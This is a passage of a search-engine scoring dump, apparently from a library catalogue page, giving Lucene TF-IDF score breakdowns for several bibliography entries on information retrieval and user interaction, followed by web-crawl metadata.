idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.071800604 = weight(abstract_txt:interaction in 5563) [ClassicSimilarity], result of:\n0.071800604 = score(doc=5563,freq=1.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n0.32873425 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.048590105 = weight(abstract_txt:retrieval in 5563) [ClassicSimilarity], result of:\n0.048590105 = score(doc=5563,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3066987 = fieldWeight in 5563, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.03925476 = weight(abstract_txt:systems in 5563) [ClassicSimilarity], result of:\n0.03925476 = score(doc=5563,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.21334855 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.08771419 = weight(abstract_txt:system in 5563) [ClassicSimilarity], result of:\n0.08771419 = score(doc=5563,freq=4.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.4205845 = fieldWeight in 5563, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.36966416 = weight(abstract_txt:designer in 5563) [ClassicSimilarity], result of:\n0.36966416 = score(doc=5563,freq=2.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = queryNorm\n0.7151789 = fieldWeight in 5563, 
product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.32 = coord(8/25)\n```\n2. Geyser, E.P.: ¬A model for the evaluation of an information retrieval system in terms of user friedliness (1993) 0.24\n```0.23989287 = sum of:\n0.23989287 = product of:\n0.9995536 = sum of:\n0.12822002 = weight(abstract_txt:user in 2943) [ClassicSimilarity], result of:\n0.12822002 = score(doc=2943,freq=5.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.8998221 = fieldWeight in 2943, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.08503268 = weight(abstract_txt:retrieval in 2943) [ClassicSimilarity], result of:\n0.08503268 = score(doc=2943,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.5367227 = fieldWeight in 2943, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.068695836 = weight(abstract_txt:systems in 2943) [ClassicSimilarity], result of:\n0.068695836 = score(doc=2943,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.37335998 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.07674992 = weight(abstract_txt:system in 2943) [ClassicSimilarity], result of:\n0.07674992 = score(doc=2943,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.36801144 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.45743608 = weight(abstract_txt:designer in 2943) [ClassicSimilarity], result of:\n0.45743608 = score(doc=2943,freq=1.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = queryNorm\n0.8849888 = fieldWeight in 2943, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.18341903 = weight(abstract_txt:model in 2943) [ClassicSimilarity], result of:\n0.18341903 = score(doc=2943,freq=2.0), product of:\n0.29588136 = queryWeight, product of:\n3.9159498 = boost\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.018853271 = queryNorm\n0.6199074 = fieldWeight in 2943, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.0076866 = idf(docFreq=2136, maxDocs=43254)\n0.109375 = fieldNorm(doc=2943)\n0.24 = coord(6/25)\n```\n3. 
Jouis, C.: System of types + inter-concept relations properties : towards validation of constructed terminologies (1998) 0.20\n```0.20285997 = sum of:\n0.20285997 = product of:\n0.6339374 = sum of:\n0.0319581 = weight(abstract_txt:database in 2057) [ClassicSimilarity], result of:\n0.0319581 = score(doc=2057,freq=1.0), product of:\n0.09585497 = queryWeight, product of:\n1.1913836 = boost\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.018853271 = queryNorm\n0.33340055 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.033310637 = weight(abstract_txt:specific in 2057) [ClassicSimilarity], result of:\n0.033310637 = score(doc=2057,freq=1.0), product of:\n0.09854077 = queryWeight, product of:\n1.2079592 = boost\n4.326901 = idf(docFreq=1552, maxDocs=43254)\n0.018853271 = queryNorm\n0.33803913 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.326901 = idf(docFreq=1552, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.069119655 = weight(abstract_txt:conceptual in 2057) [ClassicSimilarity], result of:\n0.069119655 = score(doc=2057,freq=2.0), product of:\n0.12723845 = queryWeight, product of:\n1.37263 = boost\n4.9167504 = idf(docFreq=860, maxDocs=43254)\n0.018853271 = queryNorm\n0.5432293 = fieldWeight in 2057, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.9167504 = idf(docFreq=860, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.025971167 = weight(abstract_txt:between in 2057) [ClassicSimilarity], result of:\n0.025971167 = score(doc=2057,freq=1.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.27179372 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.042947993 = weight(abstract_txt:retrieval in 2057) [ClassicSimilarity], result of:\n0.042947993 = score(doc=2057,freq=1.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.27108592 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.04906845 = weight(abstract_txt:systems in 2057) [ClassicSimilarity], result of:\n0.04906845 = score(doc=2057,freq=1.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.2666857 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.05482137 = weight(abstract_txt:system in 2057) [ClassicSimilarity], result of:\n0.05482137 = score(doc=2057,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.2628653 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.32674003 = weight(abstract_txt:designer in 2057) [ClassicSimilarity], result of:\n0.32674003 = score(doc=2057,freq=1.0), product of:\n0.5168835 = queryWeight, product of:\n3.3883343 = boost\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.018853271 = 
queryNorm\n0.6321348 = fieldWeight in 2057, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.091326 = idf(docFreq=35, maxDocs=43254)\n0.078125 = fieldNorm(doc=2057)\n0.32 = coord(8/25)\n```\n4. Spink, A.; Cole, C.: New directions in cognitive information retrieval : conclusion and further research (2005) 0.19\n```0.18848242 = sum of:\n0.18848242 = product of:\n0.58900756 = sum of:\n0.02237067 = weight(abstract_txt:database in 1763) [ClassicSimilarity], result of:\n0.02237067 = score(doc=1763,freq=1.0), product of:\n0.09585497 = queryWeight, product of:\n1.1913836 = boost\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.018853271 = queryNorm\n0.23338039 = fieldWeight in 1763, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.267527 = idf(docFreq=1647, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.03635963 = weight(abstract_txt:between in 1763) [ClassicSimilarity], result of:\n0.03635963 = score(doc=1763,freq=4.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.3805112 = fieldWeight in 1763, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.08109345 = weight(abstract_txt:user in 1763) [ClassicSimilarity], result of:\n0.08109345 = score(doc=1763,freq=8.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.5690974 = fieldWeight in 1763, product of:\n2.828427 = tf(freq=8.0), with freq of:\n8.0 = termFreq=8.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.14048216 = weight(abstract_txt:interaction in 1763) [ClassicSimilarity], result of:\n0.14048216 = score(doc=1763,freq=5.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n0.6431881 = fieldWeight in 1763, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.052071672 = weight(abstract_txt:retrieval in 1763) [ClassicSimilarity], result of:\n0.052071672 = score(doc=1763,freq=3.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3286742 = fieldWeight in 1763, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.048575286 = weight(abstract_txt:systems in 1763) [ClassicSimilarity], result of:\n0.048575286 = score(doc=1763,freq=2.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.26400536 = fieldWeight in 1763, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.08670244 = weight(abstract_txt:machine in 1763) [ClassicSimilarity], result of:\n0.08670244 = score(doc=1763,freq=1.0), product of:\n0.29798394 = queryWeight, product of:\n2.970679 = boost\n5.320475 = idf(docFreq=574, maxDocs=43254)\n0.018853271 = queryNorm\n0.29096347 = fieldWeight in 1763, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.320475 = idf(docFreq=574, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.12135227 = 
weight(abstract_txt:system in 1763) [ClassicSimilarity], result of:\n0.12135227 = score(doc=1763,freq=10.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.5818772 = fieldWeight in 1763, product of:\n3.1622777 = tf(freq=10.0), with freq of:\n10.0 = termFreq=10.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0546875 = fieldNorm(doc=1763)\n0.32 = coord(8/25)\n```\n5. Beaulieu, M.: Interaction in information searching and retrieval (2000) 0.18\n```0.17655498 = sum of:\n0.17655498 = product of:\n0.5517343 = sum of:\n0.07072253 = weight(abstract_txt:computerised in 544) [ClassicSimilarity], result of:\n0.07072253 = score(doc=544,freq=1.0), product of:\n0.14992101 = queryWeight, product of:\n1.0535631 = boost\n7.5477104 = idf(docFreq=61, maxDocs=43254)\n0.018853271 = queryNorm\n0.4717319 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.5477104 = idf(docFreq=61, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.019859895 = weight(abstract_txt:well in 544) [ClassicSimilarity], result of:\n0.019859895 = score(doc=544,freq=1.0), product of:\n0.08100005 = queryWeight, product of:\n1.0951836 = boost\n3.9229398 = idf(docFreq=2325, maxDocs=43254)\n0.018853271 = queryNorm\n0.24518374 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.9229398 = idf(docFreq=2325, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.029383019 = weight(abstract_txt:between in 544) [ClassicSimilarity], result of:\n0.029383019 = score(doc=544,freq=2.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.30749947 = fieldWeight in 544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.056753594 = weight(abstract_txt:user in 544) [ClassicSimilarity], result of:\n0.056753594 = score(doc=544,freq=3.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.3982852 = fieldWeight in 544, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.22705346 = weight(abstract_txt:interaction in 544) [ClassicSimilarity], result of:\n0.22705346 = score(doc=544,freq=10.0), product of:\n0.21841535 = queryWeight, product of:\n2.202579 = boost\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.018853271 = queryNorm\n1.039549 = fieldWeight in 544, product of:\n3.1622777 = tf(freq=10.0), with freq of:\n10.0 = termFreq=10.0\n5.259748 = idf(docFreq=610, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.048590105 = weight(abstract_txt:retrieval in 544) [ClassicSimilarity], result of:\n0.048590105 = score(doc=544,freq=2.0), product of:\n0.15842944 = queryWeight, product of:\n2.4217663 = boost\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.018853271 = queryNorm\n0.3066987 = fieldWeight in 544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4699 = idf(docFreq=3658, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.055514615 = weight(abstract_txt:systems in 544) [ClassicSimilarity], result of:\n0.055514615 = score(doc=544,freq=2.0), product of:\n0.18399356 = queryWeight, product of:\n2.858948 = boost\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.018853271 = queryNorm\n0.3017204 = fieldWeight in 
544, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.4135768 = idf(docFreq=3870, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.043857094 = weight(abstract_txt:system in 544) [ClassicSimilarity], result of:\n0.043857094 = score(doc=544,freq=1.0), product of:\n0.20855308 = queryWeight, product of:\n3.287658 = boost\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.018853271 = queryNorm\n0.21029225 = fieldWeight in 544, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.364676 = idf(docFreq=4064, maxDocs=43254)\n0.0625 = fieldNorm(doc=544)\n0.32 = coord(8/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6823242,"math_prob":0.99832094,"size":17388,"snap":"2021-31-2021-39","text_gpt3_token_len":6678,"char_repetition_ratio":0.24913713,"word_repetition_ratio":0.44731802,"special_character_ratio":0.5367495,"punctuation_ratio":0.28198695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99980885,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-22T21:12:43Z\",\"WARC-Record-ID\":\"<urn:uuid:186b5d36-3595-4e99-94de-b8207314fb26>\",\"Content-Length\":\"32689\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:849674d7-2ca8-4fda-aaa7-faf7277cf426>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab227607-1ea4-4210-89ef-441e60622200>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/3844\",\"WARC-Payload-Digest\":\"sha1:CRST5BTFYLJ6D7LLAU56HCZ6UF6SOOSJ\",\"WARC-Block-Digest\":\"sha1:67FLNAXB24L5M33YB3ABP3DU5EFW4TXA\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057388.12_warc_CC-MAIN-20210922193630-20210922223630-00378.warc.gz\"}"}
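The "Similar documents" listings in the record above are Lucene explain trees for a classic TF-IDF similarity: each matching term contributes queryWeight × fieldWeight, with queryWeight = boost × idf × queryNorm and fieldWeight = √tf × idf × fieldNorm. The toy function below only re-checks that arithmetic with constants copied from the first clause of document 5563; the function name and the "ClassicSimilarity-style" structure are read off the dump, not taken from the site's code.

```python
import math

def classic_term_score(freq, idf, query_norm, field_norm, boost=1.0):
    # One term's contribution in a Lucene ClassicSimilarity-style explain tree.
    query_weight = boost * idf * query_norm
    field_weight = math.sqrt(freq) * idf * field_norm
    return query_weight * field_weight

# weight(abstract_txt:novice in 5563): freq=1, idf=7.1639853, queryNorm=0.018853271, fieldNorm=0.0625
print(classic_term_score(1.0, 7.1639853, 0.018853271, 0.0625))  # close to 0.060475, as in the dump
```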
https://blogs.berkeley.edu/2015/03/13/happy-pi-day-2015/
[ "# Happy Pi Day 2015!\n\nHojae Lee, bioengineering major | March 13, 2015\n\nBy Hojae Lee, a Berkeley Math Circle assistant, and Laura Pierson, a high-school student at The College Preparatory School, in Oakland, Calif.\n\nIt’s time to celebrate Π Day! And 3/14/15 is a special Π Day, as the date forms the first five digits of Π (3.1415), and at 9:26:53, the date and time will be the first ten digits.\n\nMost of us have heard of the famous circle constant, slightly more than three. It arises in the simplest and most natural way: the ratio of the circumference of a circle to its diameter. It has been studied for more than 2,000 years. The ancient Greek mathematician Archimedes even correctly calculated its value to three decimal places by inscribing a regular 96-sided polygon in a circle.", null, "Yet this seemingly simple number has many strange and fascinating properties. For instance, what happens when you alternately add and subtract the reciprocals of the odd numbers? Surprisingly, the sum is exactly Π/4:\n\n1 – 1/3 + 1/5 – 1/7 + … = Π/4\n\nIntuitively, you would never expect that a sum of rational numbers would be connected to the geometry of circles. The sum of the reciprocals of the squares of positive integers is also connected to Π:\n\n1/1² + 1/2² + 1/3² + … = Π²/6.\n\nTake another seemingly unrelated problem, known as “Buffon's needle.” Suppose you drop a one-inch long needle on a surface that has equally spaced lines drawn on it, each one inch apart. What is the probability that the needle will land on one of the lines? Once again, the result is unexpectedly connected to Π: the probability is 2/Π.\n\nΠ is also connected to the imaginary number i, the square root of negative one. The complex numbers (sums of ordinary real numbers and multiples of the imaginary i) have an elegant geometric representation as points in a plane, and it turns out raising a number to an imaginary power rotates it about the origin of this plane. Among other things, this leads to Euler's famous formula\n\ne^(iΠ) = -1,\n\nwhere e = 2.71828… is Euler's number.\n\nThis is what is great about math. You can take seemingly simple or unrelated ideas, and yet they turn out to be connected in surprising and beautiful ways. The world of mathematics is much stranger and more interesting than it might seem. For many Bay Area kids, the Berkeley Math Circle has been a window into this world.\n\nAt the Berkeley Math Circle, students in elementary, middle, and high school meet on a weekly basis to explore such beauties of mathematics. It is the second Math Circle that started in the United States in 1988 and that is modeled after Eastern European programs; hundreds of others have started since then to foster many great mathematicians.\n\nThere are now more than 400 students in the Berkeley Math Circle (meeting every Tuesday of the academic year, 6-8 p.m. in Evans Hall), each with a unique background in math. Nevertheless, there is an axiom that applies to all Math Circle students: “We have an unending enthusiasm and love for math!”" ]
[ null, "http://berkeleyblog.wpengine.com/wp-content/uploads/2015/03/Pi-Art300.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9451585,"math_prob":0.9414459,"size":2932,"snap":"2022-27-2022-33","text_gpt3_token_len":680,"char_repetition_ratio":0.10211749,"word_repetition_ratio":0.0,"special_character_ratio":0.2329468,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97275436,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T23:37:10Z\",\"WARC-Record-ID\":\"<urn:uuid:9ffb6678-f7d0-456a-b4c8-ecc4c009ca28>\",\"Content-Length\":\"34696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:465a99f1-6c77-47c0-90d3-159b4e4d2987>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2e64b1d-6470-4fed-ba3e-d622268f8949>\",\"WARC-IP-Address\":\"35.185.15.143\",\"WARC-Target-URI\":\"https://blogs.berkeley.edu/2015/03/13/happy-pi-day-2015/\",\"WARC-Payload-Digest\":\"sha1:CPXHI67B5ALHDXDCTYOSZTUARNHDHOHX\",\"WARC-Block-Digest\":\"sha1:2CTW5TPLLV5CLJ2A7TRB2LCG2OW5PUYU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103947269.55_warc_CC-MAIN-20220701220150-20220702010150-00768.warc.gz\"}"}
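The post above points at three appearances of Π: the alternating odd-reciprocal series, the sum of inverse squares, and Buffon's needle. The sketch below estimates Π all three ways; the helper name, the term counts and the trial counts are arbitrary choices made here, and the Monte Carlo needle estimate will of course wobble from run to run.

```python
import math
import random

# Leibniz series: 1 - 1/3 + 1/5 - 1/7 + ... = Π/4
leibniz = 4 * sum((-1) ** k / (2 * k + 1) for k in range(200_000))

# Basel problem: 1/1² + 1/2² + 1/3² + ... = Π²/6
basel = math.sqrt(6 * sum(1 / n ** 2 for n in range(1, 200_000)))

# Buffon's needle: a 1-inch needle on lines 1 inch apart crosses a line with probability 2/Π.
def buffon(trials=200_000):
    hits = 0
    for _ in range(trials):
        center = random.uniform(0, 0.5)           # distance from needle center to nearest line
        angle = random.uniform(0, math.pi / 2)    # acute angle between needle and the lines
        hits += center <= math.sin(angle) / 2
    return 2 * trials / hits

print(leibniz, basel, buffon())
```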
https://encyclopediaofmath.org/index.php?title=Cross_ratio&diff=prev&oldid=31659
[ "# Difference between revisions of \"Cross ratio\"\n\nJump to: navigation, search\n\ndouble ratio, anharmonic ratio, of four points $M_1$, $M_2$, $M_3$, $M_4$ on a straight line\n\nA number denoted by the symbol $(M_1M_2M_3M_4)$ and equal to\n\n$$\\frac{M_1M_3}{M_3M_2}:\\frac{M_1M_4}{M_4M_2}.$$\n\nHere, the ratio $M_1M_3/M_3M_2$ is considered to be positive if the directions of the segments $M_1M_3$ and $M_3M_2$ coincide, and is considered to be negative if these directions are opposite. The cross ratio depends on the numbering of the points, which may or may not be the same as the order of their appearance on the straight line. As well as the cross ratio of four points, one may consider the cross ratio of four straight lines passing through a point. This ratio, which is denoted by the symbol $(m_1m_2m_3m_4)$, is equal to\n\n$$\\frac{\\sin(m_1m_3)}{\\sin(m_3m_2)}:\\frac{\\sin(m_1m_4)}{\\sin(m_4m_2)},$$\n\nand the angle $(m_im_j)$ between the straight lines $m_i$ and $m_j$ is considered together with its sign. If the points $M_1$, $M_2$, $M_3$, $M_4$ lie on the straight lines $m_1$, $m_2$, $m_3$, $m_4$, one has\n\n$$(M_1M_2M_3M_4)=(m_1m_2m_3m_4).$$\n\nIf the points $M_1$, $M_2$, $M_3$, $M_4$ and $M_1'$, $M_2'$, $M_3'$, $M_4'$ are obtained by the intersection of the same quadruple of straight lines $m_1$, $m_2$, $m_3$, $m_4$, then\n\n$$(M_1M_2M_3M_4)=(M_1'M_2'M_3'M_4').$$\n\nThe cross ratio is an invariant of projective transformations. A cross ratio equal to $-1$ is known as a harmonic ratio (cf. Harmonic quadruple of points).\n\n#### Comments\n\nHow to Cite This Entry:\nCross ratio. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Cross_ratio&oldid=31659\nThis article was adapted from an original article by E.G. Poznyak (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8754326,"math_prob":0.999956,"size":3396,"snap":"2021-04-2021-17","text_gpt3_token_len":1177,"char_repetition_ratio":0.15271227,"word_repetition_ratio":0.72583824,"special_character_ratio":0.3492344,"punctuation_ratio":0.14746544,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-13T04:55:25Z\",\"WARC-Record-ID\":\"<urn:uuid:0f9c9e4f-fc80-4246-8108-ef1a72f960c7>\",\"Content-Length\":\"20496\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:373d3e3f-a6ce-49fc-8d37-eb8e8001b2a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:6ee14fb7-4918-4dd2-86f6-ce669854a8a4>\",\"WARC-IP-Address\":\"34.96.94.55\",\"WARC-Target-URI\":\"https://encyclopediaofmath.org/index.php?title=Cross_ratio&diff=prev&oldid=31659\",\"WARC-Payload-Digest\":\"sha1:BTBORLEI2KRZXXX2BNKTOFW4CVUVWMID\",\"WARC-Block-Digest\":\"sha1:BFC73Y475TGIVGUYPXXJ7ITKMMFDCPB6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038072082.26_warc_CC-MAIN-20210413031741-20210413061741-00378.warc.gz\"}"}
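The entry above defines the cross ratio through signed ratios of directed segments and states that it is a projective invariant. Below is a short numerical sketch of both facts, assuming the four points are given by coordinates on a line; the sample points and the fractional-linear map are arbitrary choices made here.

```python
from fractions import Fraction

def cross_ratio(x1, x2, x3, x4):
    # (M1 M2 M3 M4) = (M1M3 / M3M2) : (M1M4 / M4M2), with directed segments x_j - x_i.
    return ((x3 - x1) / (x2 - x3)) / ((x4 - x1) / (x2 - x4))

def projective(x, a, b, c, d):
    # A projective transformation of the line in coordinates: x -> (a*x + b) / (c*x + d).
    return (a * x + b) / (c * x + d)

pts = [Fraction(p) for p in (0, 3, 1, 7)]
before = cross_ratio(*pts)
after = cross_ratio(*(projective(x, 2, 1, 1, 5) for x in pts))
print(before, after, before == after)   # identical values: the cross ratio is invariant
```

With exact `Fraction` arithmetic the equality is exact; a value of -1 would flag a harmonic quadruple, as mentioned at the end of the entry.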
https://scicomp.stackexchange.com/questions/23354/methods-for-solving-x-axb-for-small-sparse-singular-a
